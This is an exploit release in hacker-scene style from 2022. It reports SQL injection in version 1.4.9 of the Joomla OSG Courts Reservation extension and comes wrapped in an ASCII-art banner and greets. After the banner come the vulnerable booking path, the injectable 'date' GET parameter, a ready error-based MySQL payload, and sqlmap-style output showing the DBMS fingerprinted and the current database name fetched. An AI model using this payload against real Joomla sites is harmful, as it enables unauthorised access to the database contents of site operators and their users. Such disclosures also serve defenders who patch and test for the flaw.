Joomla OSG Courts Reservation extension version 1.4.9 suffers from a remote SQL injection vulnerability.
ca209e0069c5cc7fa81a80ace3a60142ef8f4a75061b70d9f0c0dff799781875
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : extensions.joomla.org │
│ Vendor : Webtribute GmbH - courts-reservation.ch │
│ Software : Joomla OSG Courts Reservation 1.4.9 │
│ Vuln Type: SQL Injection │
│ Method : GET │
│ Impact : Database Access │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise │
│ │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/CryptozJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Path: /en/table-views/tab-view/booking
GET parameter 'date' is vulnerable
---
Parameter: date (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: rid=17&tsid=16&date=2022-10-12" AND (SELECT 6041 FROM(SELECT COUNT(*),CONCAT(0x716b7a7671,(SELECT (ELT(6041=6041,1))),0x7170766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- fmfh&wd=3
---
[+] Starting the Attack
[INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[INFO] fetching current database
current database: '***_osg_courts_demo'
[-] Done